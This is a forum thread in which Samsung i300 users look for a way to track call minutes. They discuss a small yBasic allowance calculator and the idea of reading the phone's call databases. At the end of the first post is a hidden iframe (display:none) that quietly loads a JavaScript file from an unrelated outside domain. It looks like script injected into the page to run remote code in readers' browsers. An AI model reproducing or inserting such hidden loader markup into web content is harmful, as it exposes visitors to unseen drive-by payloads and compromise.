is there a new program to track usage?

Hello All
I read the thread regarding tracking usage on the i300 but as it seems a little out of date, decided to ask anyways in case of new developments.
I used to have the Kyocera 6035 and used a progam called "minutes". The utility tracked peak/off-peak/data usage and deducted it from the monthly allowance. Is there anything remotely close to this for the i300. I know I can use *4 but having a running tally makes so much more sense. Is anyone using anything to accomplish this act? I really miss my "minutes" !!! Thanks guys...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I wrote a short program in yBasic that computes my daily "allowance" of anytime minutes. It first calculates the number of weekdays remaining in my SprintPCS billing cycle. Then it asks for the number of anytime minutes remaining in the billing cycle (obtained from *4). The program then divides the number of remaining minutes by the number of remaining weekdays and displays my daily allocation of anytime minutes. (I don't worry about evening and weekend minutes because I have never run short of them--yet.)

If anyone is interested, I can post the program. Unfortunately, I don't have a way to compile it or convert it to a .prc file, but maybe someone else can do that.

hhmmmmm...i am a computer science major with an emphasis on C++. If you can post the program I am sure that between everyone we could come up with a viable program. Please!!! Post it...

This link should take you to my home page on Mindspring, where I've posted my "minutes-per-day" program.

Hello
I compiled and ran your program. First of all, well done on attempting a much nedded application. However, from what i can see you prog still needs the user to dial *4 to get remaining minutes and then it does a mathematical representation of minutes left/days left. I think the trick is to pull the minutes used from the built in db's in the i300. I emailed the author of the 6035 "minute" program to see if he would lend any input. Hopefully a combined effort may solve this problem. I dont know about anyone else but I feel dialing *4 to find usage is a little too much hassle when the db's of time used is already sitting on the phone. Any input appreciated.

we have covered this before. the call db on the samsung does not go up to 999 llike the kyo does ( i think we get only 20 calls on the list?). however, there is a code you can input that will show a call counter. its posted on another thread...

Hi
I read the previous posts and did not see a definitive answer to the problem (hence the word "new" in the title). The built in tracking on the phone that was discovered is far from a remedy because by simply hitting the wrong biutton you will have to have your phone reset. My post was to discover if any new apps had been released since the original thread in order to solve this problem.
Another direction I hope the thread takes is if we can all submit what we know of the i300 and its db's, we can create a freeware prog ourselves. The programming aspect is really quite trivial, reading/accessing the db format is the tricky part.
As the daily postings on the board are not immense I felt that this would be a practical/useful usage of board space.

Hello All
Here is the reply i got from Rick the author of the 6035 "minute" program. He sent us a sizeable piece of the original "minute" code. Not had time to look at the code yet. Are there any other programmers in the group so we can get this thing going?

I had to use a website because the code sent is too long. You will find the code from Rick here .
